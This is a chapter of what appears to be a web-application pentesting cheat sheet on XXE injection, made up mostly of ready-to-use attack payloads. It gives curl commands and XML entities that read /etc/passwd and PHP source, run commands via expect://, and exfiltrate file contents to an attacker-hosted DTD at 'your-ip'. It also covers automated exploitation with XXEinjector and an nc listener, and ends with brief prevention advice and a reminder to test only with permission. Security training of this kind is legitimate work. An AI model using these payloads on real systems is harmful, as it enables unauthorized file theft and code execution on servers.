3. XML External Entity XXE Injection

Introduction to XXE

Definition: XXE vulnerabilities occur when a web application parses XML input from a user without proper sanitization, allowing attackers to inject malicious XML entities.

Impact: Can lead to:

Sensitive file disclosure (e.g., reading /etc/passwd)
Server-side request forgery (SSRF)
Denial-of-service (DoS)
Remote code execution (RCE)

OWASP Top 10: XXE is considered a significant web security risk.

XML Basics

XML Structure:

XML documents consist of elements, attributes, entities, and declarations.
DTD (Document Type Definition): Defines the structure of an XML document and can be internal or external.
XML Entities: Variables within XML documents, including internal and external entities.
External entities can reference local or remote files.

Exploitation Techniques

1. Local File Disclosure

Identification: Look for web pages that accept XML input.

Exploitation: Define external entities to reference local files.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

2. Source Code Disclosure (PHP Filter)

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

3. Remote Code Execution (RCE) with Expect

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

4. CDATA Exfiltration via External DTD

Create xxe.dtd:

<!ENTITY joined "%begin;%file;%end;">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]>
<root>&joined;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]><root>&joined;</root>' http://target.com/vulnerable.php

5. Error-Based XXE with External DTD

Create xxe.dtd:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>' http://target.com/vulnerable.php

6. Out-of-Band (OOB) Exfiltration with External DTD

Create xxe.dtd:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://your-ip:8000/?content=%file;'>">

Host a PHP server:

php -S 0.0.0.0:8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %oob; ]><root>&content;</root>

7. Automated XXE Exploitation with XXEinjector

Clone the tool:

git clone https://github.com/enjoiz/XXEinjector.git

Create request.txt:

POST /vulnerable.php HTTP/1.1
...headers...
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Run the exploit:

ruby XXEinjector.rb --host=your-ip --httpport=8000 --file=request.txt --path=/etc/passwd --oob=http --phpfilter

Set up listeners:

nc -lvp 8000

Capture DNS requests:

tcpdump -i tun0 port 53

XXE Prevention

Disable DTDs: Configure XML parsers to disable DTD processing.
Input Validation: Sanitize and validate XML input.
Use Safe Parsing Libraries: Use XML parsers that are not vulnerable to XXE.
Update Components: Keep XML libraries and related components up to date.
Least Privilege: Run applications with minimal privileges.
Web Application Firewall (WAF): Implement a WAF to filter malicious XML input.

Key Takeaways

Understand XML Entities: Internal vs. external entities.
Advanced XXE Attacks: OOB exfiltration, error-based XXE, and parameter entities.
Use Automated Tools: XXEinjector helps automate XXE attacks.
Always test legally: Conduct security tests only on systems where you have explicit permission.
Regular Updates and Fixes: Patch and monitor applications to prevent XXE vulnerabilities.

Previous2. Insecure Direct Object References-IDOR NextWeb Attacks To The Point

Last updated 21 days ago

hashtagIntroduction to XXE

hashtagXML Basics

hashtagXML Structure:

hashtagExploitation Techniques

hashtag1. Local File Disclosure

hashtag2. Source Code Disclosure (PHP Filter)

hashtag3. Remote Code Execution (RCE) with Expect

hashtag4. CDATA Exfiltration via External DTD

hashtag5. Error-Based XXE with External DTD

hashtag6. Out-of-Band (OOB) Exfiltration with External DTD

hashtag7. Automated XXE Exploitation with XXEinjector

hashtagXXE Prevention

hashtagKey Takeaways

Introduction to XXE

XML Basics

XML Structure:

Exploitation Techniques

1. Local File Disclosure

2. Source Code Disclosure (PHP Filter)

3. Remote Code Execution (RCE) with Expect

4. CDATA Exfiltration via External DTD

5. Error-Based XXE with External DTD

6. Out-of-Band (OOB) Exfiltration with External DTD

7. Automated XXE Exploitation with XXEinjector

XXE Prevention

Key Takeaways